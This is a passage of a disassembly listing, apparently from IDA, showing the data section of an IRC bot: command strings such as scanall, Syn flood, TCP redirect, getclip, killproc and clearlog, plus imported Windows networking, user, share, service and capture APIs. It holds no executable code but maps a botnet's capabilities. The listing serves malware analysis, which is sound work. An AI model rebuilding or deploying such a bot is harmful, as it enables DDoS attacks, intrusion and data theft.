dd 2 dup(0)
aSend db 'send',0 ; DATA XREF: sub_4087B3+18EF�o
; sub_40E59D+5D2�o
align 4
unk_42F044 db 2 ; DATA XREF: sub_4087B3:loc_40A098�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aUserListFailed db ' User list failed.',0
align 4
dd 2 dup(0)
unk_42F074 db 2 ; DATA XREF: sub_4087B3+18DE�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aUserListComple db ' User list completed.',0
align 10h
dd 2 dup(0)
unk_42F0A8 db 2 ; DATA XREF: sub_4087B3:loc_409FFA�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aShareListFaile db ' Share list failed.',0
dd 2 dup(0)
unk_42F0D8 db 2 ; DATA XREF: sub_4087B3+183D�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aShareListCompl db ' Share list completed.',0
align 4
dd 2 dup(0)
aShare db 'share',0 ; DATA XREF: sub_4087B3+17DA�o
align 4
aContinue db 'continue',0 ; DATA XREF: sub_4087B3+17A0�o
align 10h
aPause db 'pause',0 ; DATA XREF: sub_4087B3+1786�o
align 4
aStop db 'stop',0 ; DATA XREF: sub_4087B3+176C�o
align 10h
unk_42F130 db 2 ; DATA XREF: sub_4087B3:loc_409F12�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aServiceListFai db ' Service list failed.',0
align 4
dd 2 dup(0)
unk_42F164 db 2 ; DATA XREF: sub_4087B3+1755�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aServiceListCom db ' Service list completed.',0
align 4
dd 2 dup(0)
aStart db 'start',0 ; DATA XREF: sub_4087B3+1705�o
align 4
unk_42F1A4 db 2 ; DATA XREF: sub_4087B3+16D3�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aFailedToLoadAd db ' Failed to load advapi32.dll or netapi32.dll.',0
align 4
dd 3 dup(0)
dword_42F1F4 dd 74656Eh ; DATA XREF: sub_4087B3+16AF�o
unk_42F1F8 db 2 ; DATA XREF: sub_4087B3:loc_409E49�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 64h
db 65h ; e
db 6Eh, 6Ch, 1Fh
db 74h ; t
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aNoThreadFound_ db ' No thread found.',0
align 4
dd 2 dup(0)
unk_42F22C db 2 ; DATA XREF: sub_4087B3+168C�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 64h
db 65h ; e
db 6Eh, 6Ch, 1Fh
db 74h ; t
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aServerStopped_ db ' Server stopped. (%d thread(s) stopped.)',0
dd 3 dup(0)
dword_42F278 dd 66666Fh ; DATA XREF: sub_4087B3+1669�o
unk_42F27C db 2 ; DATA XREF: sub_4087B3+15FF�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 64h
db 65h ; e
db 6Eh, 6Ch, 1Fh
db 74h ; t
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aAlreadyRunni_1 db ' Already running.',0
align 10h
aOn db 'on',0 ; DATA XREF: sub_4087B3+15E3�o
align 4
aSrv_ident db 'srv.ident',0 ; DATA XREF: sub_4087B3+15CC�o
align 10h
aRf db 'rf',0 ; DATA XREF: sub_4087B3+15B7�o
align 4
aReadfile db 'readfile',0 ; DATA XREF: sub_4087B3+15A2�o
align 10h
aMirc db 'mirc',0 ; DATA XREF: sub_4087B3+158D�o
align 4
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_4087B3+1578�o
dd 0
aV: ; DATA XREF: sub_4087B3+1563�o
unicode 0, <v>,0
aVisit db 'visit',0 ; DATA XREF: sub_4087B3+154E�o
align 10h
aDel db 'del',0 ; DATA XREF: sub_4087B3+1539�o
aDelete db 'delete',0 ; DATA XREF: sub_4087B3+1524�o
; sub_4087B3+17BD�o
align 4
aKi db 'ki',0 ; DATA XREF: sub_4087B3+150F�o
align 10h
aKill db 'kill',0 ; DATA XREF: sub_4087B3+14FA�o
align 4
aKp db 'kp',0 ; DATA XREF: sub_4087B3+14E5�o
align 4
aKillproc db 'killproc',0 ; DATA XREF: sub_4087B3+14D0�o
align 4
aDn db 'dn',0 ; DATA XREF: sub_4087B3+14BB�o
align 4
aDns db 'dns',0 ; DATA XREF: sub_4087B3+14A6�o
aIrc_news db 'irc.news',0 ; DATA XREF: sub_4087B3+1491�o
align 4
aNewserver db 'newserver',0 ; DATA XREF: sub_4087B3+147C�o
align 4
aO: ; DATA XREF: sub_4087B3+1467�o
unicode 0, <o>,0
aPr db 'pr',0 ; DATA XREF: sub_4087B3+143D�o
align 10h
aPrefix db 'prefix',0 ; DATA XREF: sub_4087B3+1428�o
align 4
aClone_rn db 'clone.rn',0 ; DATA XREF: sub_4087B3+1413�o
align 4
aClone_rndnick db 'clone.rndnick',0 ; DATA XREF: sub_4087B3+13FE�o
align 4
aClone_q db 'clone.q',0 ; DATA XREF: sub_4087B3+13E9�o
align 10h
aClone_quit db 'clone.quit',0 ; DATA XREF: sub_4087B3+13D4�o
align 10h
aK: ; DATA XREF: sub_4087B3+13BF�o
unicode 0, <k>,0
aKillthread db 'killthread',0 ; DATA XREF: sub_4087B3+13AA�o
align 10h
dd 0
aRaw db 'raw',0 ; DATA XREF: sub_4087B3+1380�o
aPt db 'pt',0 ; DATA XREF: sub_4087B3+136B�o
align 4
aPart_0 db 'part',0 ; DATA XREF: sub_4087B3+1356�o
align 4
aJ: ; DATA XREF: sub_4087B3+1341�o
unicode 0, <j>,0
aJoin db 'join',0 ; DATA XREF: sub_4087B3+132C�o
align 10h
aN: ; DATA XREF: sub_4087B3+1317�o
unicode 0, <n>,0
aNick_0 db 'nick',0 ; DATA XREF: sub_4087B3+1302�o
align 4
aScan_a db 'scan.a',0 ; DATA XREF: sub_4087B3+12DB�o
align 4
aScanall db 'scanall',0 ; DATA XREF: sub_4087B3+12C6�o
align 10h
aSrv_tftp_on db 'srv.tftp.on',0 ; DATA XREF: sub_4087B3+12B1�o
align 10h
aSrv_tftpserver db 'srv.tftpserver.on',0 ; DATA XREF: sub_4087B3+129C�o
align 8
aWeb_on db 'web.on',0 ; DATA XREF: sub_4087B3+1287�o
align 10h
aHttpd_on db 'httpd.on',0 ; DATA XREF: sub_4087B3+1272�o
align 4
aScan_cip db 'scan.cip',0 ; DATA XREF: sub_4087B3+125D�o
align 4
aScan_currentip db 'scan.currentip',0 ; DATA XREF: sub_4087B3+1248�o
align 4
dd 0
aFdns db 'fdns',0 ; DATA XREF: sub_4087B3+1233�o
align 4
aFlushdns db 'flushdns',0 ; DATA XREF: sub_4087B3+121E�o
align 10h
aFarp db 'farp',0 ; DATA XREF: sub_4087B3+1209�o
align 4
aFlusharp db 'flusharp',0 ; DATA XREF: sub_4087B3+11F4�o
align 4
aGc db 'gc',0 ; DATA XREF: sub_4087B3+11DF�o
align 4
aGetclip db 'getclip',0 ; DATA XREF: sub_4087B3+11CA�o
dd 0
unk_42F464 db 2 ; DATA XREF: sub_4087B3+11BF�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aLoginListCompl db ' Login list complete.',0
align 10h
dd 2 dup(0)
aD_S db '%d. %s',0 ; DATA XREF: sub_4087B3+118B�o
; sub_414D07+46�o
align 10h
aEmpty db '<Empty>',0 ; DATA XREF: sub_4087B3+117E�o
dd 0
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_4087B3+115C�o
align 10h
aWho db 'who',0 ; DATA XREF: sub_4087B3+1143�o
aDll db 'dll',0 ; DATA XREF: sub_4087B3+112E�o
aTestdlls db 'testdlls',0 ; DATA XREF: sub_4087B3+1119�o
align 4
aDrv db 'drv',0 ; DATA XREF: sub_4087B3+1104�o
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_4087B3+10EF�o
align 4
aUp db 'up',0 ; DATA XREF: sub_4087B3+10DA�o
align 4
aUptime db 'uptime',0 ; DATA XREF: sub_4087B3+10C5�o
align 10h
aPs db 'ps',0 ; DATA XREF: sub_4087B3+10B0�o
align 4
aProcs db 'procs',0 ; DATA XREF: sub_4087B3+109B�o
align 4
aRm db 'rm',0 ; DATA XREF: sub_4087B3+1086�o
align 10h
aRemove db 'remove',0 ; DATA XREF: sub_4087B3+1071�o
align 4
aSi db 'si',0 ; DATA XREF: sub_4087B3+105C�o
align 4
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_4087B3+1047�o
align 8
aNi db 'ni',0 ; DATA XREF: sub_4087B3+1032�o
align 4
aNetinfo db 'netinfo',0 ; DATA XREF: sub_4087B3+101D�o
align 8
aClg db 'clg',0 ; DATA XREF: sub_4087B3+1008�o
aClearlog db 'clearlog',0 ; DATA XREF: sub_4087B3+FF3�o
align 4
aLg db 'lg',0 ; DATA XREF: sub_4087B3+FDE�o
align 4
aLog db 'log',0 ; DATA XREF: sub_4087B3+FC9�o
aAl db 'al',0 ; DATA XREF: sub_4087B3+FB4�o
align 4
aAliases db 'aliases',0 ; DATA XREF: sub_4087B3+F9F�o
align 10h
aT: ; DATA XREF: sub_4087B3+F8A�o
unicode 0, <t>,0
aThreads db 'threads',0 ; DATA XREF: sub_4087B3+F75�o
align 10h
unk_42F560 db 2 ; DATA XREF: sub_4087B3+F41�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aFailedToReboot db ' Failed to reboot system.',0
align 10h
dd 2 dup(0)
unk_42F598 db 2 ; DATA XREF: sub_4087B3+F3A�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aRebootingSyste db ' Rebooting system.',0
align 10h
dd 2 dup(0)
aReboot db 'reboot',0 ; DATA XREF: sub_4087B3+F23�o
align 10h
aI_0: ; DATA XREF: sub_4087B3+F0E�o
unicode 0, <i>,0
aId db 'id',0 ; DATA XREF: sub_4087B3+EF9�o
align 4
aS_6: ; DATA XREF: sub_4087B3+EE4�o
unicode 0, <s>,0
aStatus db 'status',0 ; DATA XREF: sub_4087B3+ECF�o
align 4
aQ: ; DATA XREF: sub_4087B3+EBA�o
unicode 0, <q>,0
aQuit_0 db 'quit',0 ; DATA XREF: sub_4087B3+EA5�o
align 10h
aD_0: ; DATA XREF: sub_4087B3+E90�o
unicode 0, <d>,0
aDisconnect db 'disconnect',0 ; DATA XREF: sub_4087B3+E7B�o
align 10h
dd 0
aR: ; DATA XREF: sub_4087B3+E66�o
; sub_4087B3+1395�o ...
unicode 0, <r>,0
aReconnect db 'reconnect',0 ; DATA XREF: sub_4087B3+E51�o
align 4
aScan_sts db 'scan.sts',0 ; DATA XREF: sub_4087B3+E3C�o
align 10h
aScanstats db 'scanstats',0 ; DATA XREF: sub_4087B3+E27�o
align 4
dword_42F62C dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+E1C�o
dd 2 dup(0)
aVuln db 'Vuln',0 ; DATA XREF: sub_4087B3+E17�o
align 10h
aScan_stop db 'scan.stop',0 ; DATA XREF: sub_4087B3+DFE�o
align 4
dword_42F65C dd 20025B02h, 6573202Dh, 1F727563h, 2D201F65h, 25D0220h
; DATA XREF: sub_4087B3+DF3�o
dd 0BB20h, 0
aSecure_0 db 'Secure',0 ; DATA XREF: sub_4087B3+DEE�o
align 10h
aSecurestop db 'securestop',0 ; DATA XREF: sub_4087B3+DD5�o
align 10h
aProcsoff db 'procsoff',0 ; DATA XREF: sub_4087B3+DC0�o
align 4
aProcsstop db 'procsstop',0 ; DATA XREF: sub_4087B3+DAB�o
align 4
dword_42F6A8 dd 20025B02h, 6674202Dh, 1F701F74h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+DA0�o
dd 2 dup(0)
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_4087B3+D82�o
align 10h
dword_42F6D0 dd 20025B02h, 7973202Dh, 201F6E1Fh, 5D02202Dh, 0BB2002h
; DATA XREF: sub_4087B3+D77�o
dd 0
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_4087B3+D72�o
align 4
aSynstop db 'synstop',0 ; DATA XREF: sub_4087B3+D59�o
align 10h
dword_42F700 dd 20025B02h, 6572202Dh, 65726964h, 1F741F63h, 2202D20h
; DATA XREF: sub_4087B3+D51�o
dd 0BB20025Dh, 2 dup(0)
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_4087B3+D4C�o
align 10h
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_4087B3+D33�o
align 10h
dword_42F740 dd 20025B02h, 6F6C202Dh, 201F671Fh, 5D02202Dh, 0BB2002h
; DATA XREF: sub_4087B3+D2B�o
dd 0
aLogList db 'Log list',0 ; DATA XREF: sub_4087B3+D26�o
align 4
aLogstop db 'logstop',0 ; DATA XREF: sub_4087B3+D0D�o
align 10h
dword_42F770 dd 74026802h, 641F7074h, 2E2E1Fh, 0 ; DATA XREF: sub_4087B3+CEB�o
aServer_0 db 'Server',0 ; DATA XREF: sub_4087B3+CE6�o
; sub_4087B3+D9B�o
align 4
aHttpdstop db 'httpdstop',0 ; DATA XREF: sub_4087B3+CCD�o
align 4
aUnsec db 'unsec',0 ; DATA XREF: sub_4087B3+CB8�o
align 4
aUnsecure db 'unsecure',0 ; DATA XREF: sub_4087B3+CA3�o
align 4
aSec db 'sec',0 ; DATA XREF: sub_4087B3+C8E�o
; sub_4087B3+4635�o
aSecure db 'secure',0 ; DATA XREF: sub_4087B3+C79�o
; sub_4087B3+4624�o
align 4
aVer db 'ver',0 ; DATA XREF: sub_4087B3+C64�o
aVersion db 'version',0 ; DATA XREF: sub_4087B3+C4F�o
dd 0
aG0t db 'g0t',0 ; DATA XREF: sub_4087B3+C3A�o
aLogout db 'logout',0 ; DATA XREF: sub_4087B3+C25�o
align 10h
aDn0 db 'dn0',0 ; DATA XREF: sub_4087B3+C10�o
aDien0w db 'dien0w',0 ; DATA XREF: sub_4087B3+BFB�o
align 4
aRn db 'rn',0 ; DATA XREF: sub_4087B3+BE6�o
align 10h
aRndnick_0 db 'rndnick',0 ; DATA XREF: sub_4087B3+BD1�o
dd 0
a63 db '63',0 ; DATA XREF: sub_4087B3+ABC�o
align 10h
asc_42F7F0: ; DATA XREF: sub_4087B3+A9D�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_4087B3+A66�o
align 4
aServer db '$server',0 ; DATA XREF: sub_4087B3+A5B�o
align 8
aRndnick db '$rndnick',0 ; DATA XREF: sub_4087B3+A4A�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_4087B3+A31�o
align 4
aUser_0 db '$user',0 ; DATA XREF: sub_4087B3+A20�o
align 4
aMe db '$me',0 ; DATA XREF: sub_4087B3+A0E�o
aD_1 db '$%d',0 ; DATA XREF: sub_4087B3+9A6�o
aD db '$%d-',0 ; DATA XREF: sub_4087B3+8FA�o
align 4
dword_42F834 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_4087B3+892�o
dd 0A0Dh, 0
dword_42F850 dd 4E495001h, 47h ; DATA XREF: sub_4087B3+85E�o
dword_42F858 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_4087B3+853�o
dd 0D017325h, 0Ah, 0
dword_42F878 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_4087B3+822�o
aLogin db 'login',0 ; DATA XREF: sub_4087B3+6DD�o
; sub_4087B3+6F2�o
align 4
a332 db '332',0 ; DATA XREF: sub_4087B3+64E�o
; sub_4087B3+714�o ...
aNotice db 'NOTICE',0 ; DATA XREF: sub_4087B3+62C�o
; sub_40E4DC+F�o
align 4
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_4087B3+620�o
; sub_40E4DC+16�o
dd 0
unk_42F8A4 db 2 ; DATA XREF: sub_4087B3+5CF�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aUserSLoggedOut db ' User: %s logged out.',0
align 10h
dd 2 dup(0)
unk_42F8D8 db 2 ; DATA XREF: sub_4087B3+5A8�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aJoinedChanne_0 db ' Joined channel: %s.',0
align 4
dd 2 dup(0)
dword_42F90C dd 333533h ; DATA XREF: sub_4087B3+571�o
aPart db 'PART',0 ; DATA XREF: sub_4087B3+523�o
; sub_4087B3+5EC�o
align 4
aSS_3 db ':%s%s',0 ; DATA XREF: sub_4087B3+4FB�o
align 10h
aNick db 'NICK',0 ; DATA XREF: sub_4087B3+3CD�o
align 4
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_4087B3+36E�o
; sub_4087B3+610�o
dd 0
unk_42F93C db 2 ; DATA XREF: sub_4087B3+355�o
; sub_4087B3+478B�o ...
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aUserSLoggedO_0 db ' User %s logged out.',0
align 10h
aKick db 'KICK',0 ; DATA XREF: sub_4087B3+2E4�o
align 4
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_4087B3+28D�o
; sub_4087B3+3986�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_4087B3+265�o
a@: ; DATA XREF: sub_4087B3+23A�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_4087B3+22A�o
a005 db '005',0 ; DATA XREF: sub_4087B3+215�o
a001 db '001',0 ; DATA XREF: sub_4087B3+200�o
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_4087B3+1E4�o
; sub_4087B3+3B4�o ...
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_4087B3+1C3�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_4087B3+1A9�o
align 4
asc_42F9BC: ; DATA XREF: sub_4087B3+19A�o
; sub_4087B3+4896�o
unicode 0, <!>,0
asc_42F9C0 db ' :',0 ; DATA XREF: sub_4087B3+86�o
; sub_4087B3:loc_40904F�o
align 4
aSSS_1 db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40E4DC+58�o
dd 0
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_40E59D+C50�o
align 10h
dd 0
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_40E59D+C48�o
align 10h
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_40E59D:loc_40F1D8�o
align 10h
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_40E59D+BE6�o
align 10h
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_40E59D+BD9�o
align 10h
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_40E59D+BCC�o
align 10h
dd 0
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_40E59D+BBF�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_40E59D+BB2�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_40E59D+BAA�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_40E59D:loc_40F13A�o
align 8
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_40E59D+B68�o
align 4
dd 0
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_40E59D+B60�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_40E59D:loc_40F0F0�o
dd 0
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_40E59D+B0E�o
align 8
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_40E59D+B01�o
align 10h
dd 0
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_40E59D+AF4�o
dd 0
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_40E59D+AEC�o
dd 0
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_40E59D:loc_40F07C�o
align 10h
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_40E59D+AAA�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_40E59D+AA2�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_40E59D:loc_40F032�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_40E59D+A60�o
align 8
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_40E59D+A58�o
align 10h
dd 0
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_40E59D:loc_40EFE8�o
align 10h
dd 0
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_40E59D+9CE�o
align 10h
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_40E59D+9C1�o
align 10h
dd 0
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_40E59D+9B4�o
dd 0
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_40E59D+9A7�o
align 10h
dd 0
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_40E59D+99A�o
align 10h
dd 0
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_40E59D+98D�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_40E59D+980�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_40E59D+973�o
align 10h
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_40E59D+966�o
align 10h
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_40E59D+959�o
align 10h
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_40E59D+951�o
align 10h
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_40E59D:loc_40EEDD�o
align 10h
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_40E59D+903�o
align 10h
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_40E59D+8F6�o
dd 0
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_40E59D+8EE�o
align 8
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_40E59D:loc_40EE7E�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_40E59D+8B4�o
align 10h
dd 0
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_40E59D+842�o
dd 0
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_40E59D+835�o
align 10h
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_40E59D+828�o
align 8
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_40E59D+81B�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_40E59D+80E�o
align 4
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_40E59D+801�o
align 10h
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_40E59D+7F4�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_40E59D+7E7�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_40E59D+7DA�o
dd 2 dup(0)
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_40E59D+7D2�o
align 4
dd 0
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_40E59D:loc_40ED5E�o
dd 0
aClosesocket db 'closesocket',0 ; DATA XREF: sub_40E59D+688�o
dd 0
aGetpeername db 'getpeername',0 ; DATA XREF: sub_40E59D+67B�o
dd 0
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_40E59D+66E�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_40E59D+661�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_40E59D+654�o
dd 0
aGetsockname db 'getsockname',0 ; DATA XREF: sub_40E59D+647�o
dd 0
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_40E59D+63A�o
align 4
dd 0
aAccept db 'accept',0 ; DATA XREF: sub_40E59D+62D�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_40E59D+620�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_40E59D+613�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_40E59D+60B�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_40E59D+5F9�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_40E59D+5EC�o
align 10h
aSendto db 'sendto',0 ; DATA XREF: sub_40E59D+5DF�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_40E59D+5C5�o
align 10h
aNtohs db 'ntohs',0 ; DATA XREF: sub_40E59D+5B8�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_40E59D+5AB�o
align 10h
aHtons db 'htons',0 ; DATA XREF: sub_40E59D+59E�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_40E59D+591�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_40E59D+584�o
align 10h
aConnect db 'connect',0 ; DATA XREF: sub_40E59D+577�o
dd 0
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_40E59D+56A�o
dd 0
aSocket db 'socket',0 ; DATA XREF: sub_40E59D+55D�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_40E59D+550�o
align 10h
dd 0
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_40E59D+543�o
align 8
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_40E59D+536�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_40E59D+529�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_40E59D+51C�o
align 8
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_40E59D+50F�o
align 8
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_40E59D+507�o
align 8
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_40E59D+4F6�o
align 8
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_40E59D+483�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_40E59D+476�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_40E59D+469�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_40E59D+45C�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_40E59D+44F�o
align 10h
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_40E59D+442�o
align 10h
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_40E59D+435�o
align 8
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_40E59D+428�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_40E59D+420�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_40E59D:loc_40E9AC�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_40E59D:loc_40E984�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_40E59D+38F�o
align 10h
dd 0
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_40E59D+382�o
dd 0
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_40E59D+375�o
align 10h
dd 0
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_40E59D+368�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_40E59D+35B�o
align 8
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_40E59D+34E�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_40E59D+341�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_40E59D:loc_40E8D6�o
align 4
dd 0
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_40E59D+309�o
align 8
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_40E59D+2FC�o
align 10h
dd 0
